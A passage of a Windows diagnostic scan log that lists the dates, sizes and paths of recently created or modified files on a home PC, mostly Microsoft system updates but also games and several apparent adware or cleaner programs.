- 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2016-02-10 10:16 - 2016-01-27 03:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll 2016-02-10 10:16 - 2016-01-27 03:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe 2016-02-10 10:16 - 2016-01-27 03:54 - 00295264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2016-02-10 10:16 - 2016-01-27 03:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll 2016-02-10 10:16 - 2016-01-27 03:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll 2016-02-10 10:16 - 2016-01-27 03:45 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2016-02-10 10:16 - 2016-01-27 03:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2016-02-10 10:16 - 2016-01-27 03:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe 2016-02-10 10:16 - 2016-01-27 03:43 - 00359776 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2016-02-10 10:16 - 2016-01-27 03:37 - 00576352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2016-02-10 10:16 - 2016-01-27 03:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll 2016-02-10 10:16 - 2016-01-27 03:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll 2016-02-10 10:16 - 2016-01-27 03:13 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll 2016-02-10 10:16 - 2016-01-27 03:12 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll 2016-02-10 10:16 - 2016-01-27 03:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll 2016-02-10 10:16 - 2016-01-27 03:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll 2016-02-10 10:16 - 2016-01-27 03:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll 2016-02-10 10:16 - 2016-01-27 
03:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll 2016-02-10 10:16 - 2016-01-27 03:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll 2016-02-10 10:16 - 2016-01-27 03:05 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll 2016-02-10 10:16 - 2016-01-27 03:05 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll 2016-02-10 10:16 - 2016-01-27 03:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll 2016-02-10 10:16 - 2016-01-27 03:03 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll 2016-02-10 10:16 - 2016-01-27 03:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll 2016-02-10 10:16 - 2016-01-27 03:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-02-10 10:16 - 2016-01-27 02:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll 2016-02-10 10:16 - 2016-01-27 02:57 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2016-02-10 10:16 - 2016-01-27 02:55 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-02-10 10:16 - 2016-01-27 02:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-02-10 10:16 - 2016-01-27 02:50 - 02230784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-02-10 10:16 - 2016-01-27 02:50 - 01504768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-02-10 10:16 - 2016-01-27 02:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys 2016-02-10 10:16 - 2016-01-27 02:49 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2016-02-10 10:16 - 2016-01-27 02:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll 2016-02-10 10:16 - 2016-01-27 02:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2016-02-10 10:16 - 2016-01-27 02:39 - 02275328 
_____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-02-10 10:16 - 2016-01-27 02:38 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2016-02-10 10:16 - 2016-01-27 02:38 - 01734656 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-02-10 10:16 - 2016-01-27 02:37 - 04894720 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-02-10 10:16 - 2016-01-27 02:36 - 02757120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-02-10 10:16 - 2016-01-27 02:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2016-02-10 10:16 - 2016-01-27 02:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll 2016-02-09 21:39 - 2016-02-09 14:36 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{0da991e7-651e-44f2-a8d8-99c28d929208}Gw64.sys 2016-02-09 17:35 - 2016-02-09 17:35 - 00013200 _____ C:\Users\Maollo\Downloads\videos_carnaval.zip 2016-02-07 11:30 - 2016-02-06 08:35 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{54e9b4e5-84c4-42a5-a254-fd1f8319fc98}Gw64.sys 2016-02-05 22:42 - 2016-02-05 14:35 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{5e399338-5cac-41fc-91a7-455ee6632d3f}Gw64.sys 2016-02-05 22:40 - 2016-02-11 11:21 - 00000000 ____D C:\Program Files (x86)\Primary Color 2016-02-05 22:38 - 2016-02-05 22:39 - 00000000 ____D C:\Users\Todos os Usuários\04200 2016-02-05 22:38 - 2016-02-05 22:39 - 00000000 ____D C:\Users\Todos os Usuários\02109 2016-02-05 22:38 - 2016-02-05 22:39 - 00000000 ____D C:\ProgramData\04200 2016-02-05 22:38 - 2016-02-05 22:39 - 00000000 ____D C:\ProgramData\02109 2016-02-05 22:36 - 2016-02-05 22:36 - 00232004 _____ C:\WINDOWS\Minidump\020516-17671-01.dmp 2016-02-04 10:51 - 2016-02-05 16:51 - 00000000 ____D C:\Users\Maollo\AppData\Local\WebBar 2016-02-03 22:15 - 2016-02-03 22:15 - 00000000 ____D C:\Program Files (x86)\Professional Cleaning Software 2016-02-03 22:12 - 2016-02-03 22:12 - 00631808 _____ C:\WINDOWS\nci.dat 
2016-02-03 22:12 - 2016-02-03 22:12 - 00408576 _____ C:\WINDOWS\mnci.exe 2016-02-03 22:11 - 2016-02-03 22:12 - 00417792 _____ C:\WINDOWS\nci.exe 2016-02-03 22:11 - 2016-02-03 22:11 - 00000000 ____D C:\Program Files (x86)\RinoReader 2016-02-03 22:09 - 2016-02-03 22:09 - 00000000 ____D C:\Users\Todos os Usuários\05364 2016-02-03 22:09 - 2016-02-03 22:09 - 00000000 ____D C:\ProgramData\05364 2016-02-01 16:31 - 2016-02-01 16:31 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf 2016-02-01 11:02 - 2016-02-01 11:02 - 00003808 _____ C:\WINDOWS\System32\Tasks\Overwolf Updater Task 2016-02-01 11:02 - 2016-02-01 11:02 - 00000000 ____D C:\Users\Maollo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Overwolf 2016-02-01 11:02 - 2016-02-01 11:02 - 00000000 ____D C:\Users\Maollo\AppData\Local\CEF 2016-02-01 11:01 - 2016-02-01 11:02 - 00000000 ____D C:\Users\Todos os Usuários\Overwolf 2016-02-01 11:01 - 2016-02-01 11:02 - 00000000 ____D C:\ProgramData\Overwolf 2016-02-01 11:01 - 2016-02-01 11:02 - 00000000 ____D C:\Program Files (x86)\Overwolf 2016-02-01 10:59 - 2016-02-04 12:25 - 00000000 ____D C:\Users\Maollo\AppData\Roaming\TS3Client 2016-02-01 10:59 - 2016-02-01 13:29 - 00000000 ____D C:\Users\Maollo\AppData\Local\Overwolf 2016-02-01 10:59 - 2016-02-01 10:59 - 00000621 _____ C:\Users\Public\Desktop\TeamSpeak 3 Client.lnk 2016-02-01 10:59 - 2016-02-01 10:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client 2016-02-01 10:46 - 2016-02-01 10:55 - 31017664 _____ (TeamSpeak Systems GmbH) C:\Users\Maollo\Downloads\TeamSpeak3-Client-win64-3.0.18.2.exe 2016-01-30 18:25 - 2016-01-30 18:46 - 00000000 ____D C:\Users\Maollo\AppData\Roaming\.minecraft 2016-01-30 18:24 - 2016-01-31 10:56 - 00000000 ____D C:\Users\Maollo\Desktop\Windows 2016-01-30 18:23 - 2016-01-30 18:24 - 05468254 _____ C:\Users\Maollo\Downloads\KeiNett.Launcher.Novo.rar 2016-01-30 18:18 - 2016-01-30 18:20 - 00000356 _____ 
C:\Users\Maollo\Documents\launcher_profiles.json 2016-01-30 18:18 - 2016-01-30 18:20 - 00000000 ____D C:\Users\Maollo\Documents\versions 2016-01-30 18:18 - 2016-01-30 18:20 - 00000000 ____D C:\Users\Maollo\Documents\libraries 2016-01-30 18:11 - 2016-01-30 18:11 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Maollo\minecraft 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Maollo\AppData\Roaming\Sun 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Maollo\AppData\LocalLow\Sun 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Maollo\.oracle_jre_usage 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2016-01-30 18:10 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Todos os Usuários\Oracle 2016-01-30 18:10 - 2016-01-30 18:11 - 00000000 ____D C:\ProgramData\Oracle 2016-01-30 18:10 - 2016-01-30 18:10 - 00000000 ____D C:\Program Files (x86)\Java 2016-01-30 18:08 - 2016-01-30 18:08 - 00643168 _____ (Oracle Corporation) C:\Users\Maollo\Downloads\JavaSetup8u71.exe 2016-01-30 18:08 - 2016-01-30 18:08 - 00000000 ____D C:\Users\Maollo\AppData\LocalLow\Oracle 2016-01-29 18:53 - 2016-01-29 18:53 - 00000000 ____D C:\Users\Todos os Usuários\30689 2016-01-29 18:53 - 2016-01-29 18:53 - 00000000 ____D C:\ProgramData\30689 2016-01-29 18:50 - 2016-01-29 18:50 - 00262144 ____N C:\WINDOWS\Minidump\012916-26171-01.dmp 2016-01-29 16:49 - 2016-02-03 22:18 - 00000000 ____D C:\ProfessionalCleaningSoftware 2016-01-29 16:49 - 2016-01-29 16:49 - 00000000 ____D C:\Program Files (x86)\Pro PC Cleaner 2016-01-29 16:45 - 2016-01-29 16:45 - 00000000 ____D C:\Users\Todos os Usuários\22090 2016-01-29 16:45 - 2016-01-29 16:45 - 00000000 ____D C:\ProgramData\22090 2016-01-29 16:41 - 2016-02-05 22:36 - 431248031 _____ C:\WINDOWS\MEMORY.DMP 2016-01-29 16:41 - 2016-01-29 16:43 - 00294756 _____ 
C:\WINDOWS\Minidump\012916-25609-01.dmp 2016-01-28 17:49 - 2016-01-28 08:31 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{14399205-100e-435b-93e2-9f4ebefe8918}Gw64.sys 2016-01-28 17:48 - 2016-02-11 10:21 - 00001798 _____ C:\Users\Public\Desktop\MPC Cleaner.lnk 2016-01-28 17:48 - 2016-01-28 17:49 - 00000000 ____D C:\Users\Todos os Usuários\24912 2016-01-28 17:48 - 2016-01-28 17:49 - 00000000 ____D C:\ProgramData\24912 2016-01-28 17:48 - 2016-01-28 17:48 - 00000000 ____D C:\Users\Todos os Usuários\00509 2016-01-28 17:48 - 2016-01-28 17:48 - 00000000 ____D C:\ProgramData\00509 2016-01-28 17:47 - 2016-01-28 17:47 - 00000000 ____D C:\Users\Todos os Usuários\27756 2016-01-28 17:47 - 2016-01-28 17:47 - 00000000 ____D C:\Users\Todos os Usuários\25142 2016-01-28 17:47 - 2016-01-28 17:47 - 00000000 ____D C:\ProgramData\27756 2016-01-28 17:47 - 2016-01-28 17:47 - 00000000 ____D C:\ProgramData\25142 2016-01-28 17:45 - 2016-01-28 17:45 - 00000282 _____ C:\WINDOWS\Tasks\Launch 4540.job 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\Users\Todos os Usuários\26522 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\Users\Todos os Usuários\21817 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\Users\Todos os Usuários\18388 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\ProgramData\26522 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\ProgramData\21817 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\ProgramData\18388 2016-01-28 17:40 - 2016-01-28 17:41 - 00000000 ____D C:\Users\Todos os Usuários\31750 2016-01-28 17:40 - 2016-01-28 17:41 - 00000000 ____D C:\ProgramData\31750 2016-01-28 13:22 - 2016-01-16 04:23 - 08728920 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2016-01-28 13:22 - 2016-01-16 04:20 - 06971752 _____ (Microsoft Corp.) 
C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2016-01-28 13:21 - 2016-01-16 04:21 - 01750440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe 2016-01-28 13:21 - 2016-01-16 03:45 - 16986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2016-01-28 13:21 - 2016-01-16 03:38 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll 2016-01-28 13:21 - 2016-01-16 03:35 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2016-01-28 13:21 - 2016-01-16 03:30 - 01053696 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2016-01-28 13:21 - 2016-01-16 03:28 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2016-01-28 13:21 - 2016-01-16 03:24 - 02057216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll 2016-01-28 13:21 - 2016-01-16 03:21 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll 2016-01-28 13:21 - 2016-01-16 03:20 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2016-01-28 13:21 - 2016-01-16 03:20 - 02597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll 2016-01-28 13:21 - 2016-01-16 03:20 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2016-01-28 13:21 - 2016-01-16 03:17 - 05503488 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll 2016-01-28 13:21 - 2016-01-16 03:16 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2016-01-28 13:21 - 2016-01-16 03:15 - 04759040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2016-01-28 13:21 - 2016-01-16 03:14 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2016-01-28 13:21 - 2016-01-16 03:14 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2016-01-28 13:20 - 2016-01-16 04:37 - 00202472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll 2016-01-28 13:20 - 2016-01-16 04:36 - 01173344 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-01-28 13:20 - 2016-01-16 04:36 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-01-28 13:20 - 2016-01-16 04:34 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-01-28 13:20 - 2016-01-16 04:24 - 00538632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00848160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00785088 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe 2016-01-28 13:20 - 2016-01-16 04:20 - 00652312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll 2016-01-28 13:20 - 2016-01-16 04:20 - 00431240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll 2016-01-28 13:20 - 2016-01-16 04:20 - 00366224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll 2016-01-28 13:20 - 2016-01-16 04:19 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2016-01-28 13:20 - 2016-01-16 04:19 - 00405568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2016-01-28 13:20 - 2016-01-16 04:12 - 01415200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2016-01-28 13:20 - 2016-01-16 04:09 - 01089880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys 2016-01-28 13:20 - 2016-01-16 04:08 - 01174008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2016-01-28 13:20 - 2016-01-16 04:08 - 00440152 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe 2016-01-28 13:20 - 2016-01-16 03:46 - 00067072 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\Drivers\usbser.sys 2016-01-28 13:20 - 2016-01-16 03:44 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2016-01-28 13:20 - 2016-01-16 03:44 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasadhlp.dll 2016-01-28 13:20 - 2016-01-16 03:44 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll 2016-01-28 13:20 - 2016-01-16 03:43 - 00097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttpcom.dll 2016-01-28 13:20 - 2016-01-16 03:42 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll 2016-01-28 13:20 - 2016-01-16 03:42 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscoreext.dll 2016-01-28 13:20 - 2016-01-16 03:41 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe 2016-01-28 13:20 - 2016-01-16 03:40 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasauto.dll 2016-01-28 13:20 - 2016-01-16 03:40 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaui.exe 2016-01-28 13:20 - 2016-01-16 03:40 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasautou.exe 2016-01-28 13:20 - 2016-01-16 03:39 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll 2016-01-28 13:20 - 2016-01-16 03:38 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2016-01-28 13:20 - 2016-01-16 03:38 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimCfg.dll 2016-01-28 13:20 - 2016-01-16 03:38 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winbio.dll 2016-01-28 13:20 - 2016-01-16 03:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2016-01-28 13:20 - 2016-01-16 03:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll 2016-01-28 13:20 - 2016-01-16 03:37 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll 2016-01-28 13:20 - 2016-01-16 03:37 - 00073728 _____ (Microsoft 
Corporation) C:\WINDOWS\system32\SMSRouter.dll 2016-01-28 13:20 - 2016-01-16 03:36 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2016-01-28 13:20 - 2016-01-16 03:36 - 00475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDDS.dll 2016-01-28 13:20 - 2016-01-16 03:36 - 00221696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-01-28 13:20 - 2016-01-16 03:36 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimAuth.dll 2016-01-28 13:20 - 2016-01-16 03:36 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll 2016-01-28 13:20 - 2016-01-16 03:35 - 00383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-01-28 13:20 - 2016-01-16 03:35 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasadhlp.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00610816 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00477696 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttpcom.dll 2016-01-28 13:20 - 2016-01-16 03:33 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll 2016-01-28 13:20 - 2016-01-16 03:33 - 00574976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll 2016-01-28 13:20 - 2016-01-16 03:33 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll 2016-01-28 13:20 - 2016-01-16 03:32 - 00621568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll 2016-01-28 13:20 - 2016-01-16 03:32 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pcaui.exe 2016-01-28 13:20 - 2016-01-16 03:31 - 
00851456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll 2016-01-28 13:20 - 2016-01-16 03:31 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll 2016-01-28 13:20 - 2016-01-16 03:31 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll 2016-01-28 13:20 - 2016-01-16 03:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll 2016-01-28 13:20 - 2016-01-16 03:31 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasautou.exe 2016-01-28 13:20 - 2016-01-16 03:30 - 02127360 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-01-28 13:20 - 2016-01-16 03:30 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-01-28 13:20 - 2016-01-16 03:30 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimCfg.dll 2016-01-28 13:20 - 2016-01-16 03:30 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winbio.dll 2016-01-28 13:20 - 2016-01-16 03:29 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe 2016-01-28 13:20 - 2016-01-16 03:29 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll 2016-01-28 13:20 - 2016-01-16 03:28 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll 2016-01-28 13:20 - 2016-01-16 03:28 - 00884736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll 2016-01-28 13:20 - 2016-01-16 03:28 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimAuth.dll 2016-01-28 13:20 - 2016-01-16 03:27 - 00335872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2016-01-28 13:20 - 2016-01-16 03:26 - 00535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll 2016-01-28 13:20 - 2016-01-16 03:26 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll 2016-01-28 13:20 - 2016-01-16 03:26 - 00260608 _____ C:\WINDOWS\system32\MTFServer.dll 2016-01-28 13:20 - 2016-01-16 03:26 - 00175616 
_____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll 2016-01-28 13:20 - 2016-01-16 03:25 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll 2016-01-28 13:20 - 2016-01-16 03:25 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll 2016-01-28 13:20 - 2016-01-16 03:25 - 00235008 _____ C:\WINDOWS\system32\MTF.dll 2016-01-28 13:20 - 2016-01-16 03:24 - 00613888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll 2016-01-28 13:20 - 2016-01-16 03:24 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll 2016-01-28 13:20 - 2016-01-16 03:24 - 00273408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll 2016-01-28 13:20 - 2016-01-16 03:23 - 02050048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-01-28 13:20 - 2016-01-16 03:23 - 00687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-01-28 13:20 - 2016-01-16 03:20 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll 2016-01-28 13:20 - 2016-01-16 03:19 - 00733184 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll 2016-01-28 13:20 - 2016-01-16 03:19 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll 2016-01-28 13:20 - 2016-01-16 03:19 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll 2016-01-28 13:20 - 2016-01-16 03:19 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll 2016-01-28 13:20 - 2016-01-16 03:18 - 01674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll 2016-01-28 13:20 - 2016-01-16 03:16 - 01542656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll 2016-01-28 13:20 - 2016-01-16 03:11 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll 2016-01-28 12:49 - 2016-01-28 12:49 - 00000000 ____D C:\Users\Maollo\Documents\League of Legends 2016-01-27 12:53 - 2016-01-27 12:53 - 00001465 _____ C:\Users\Public\Desktop\Blade & 
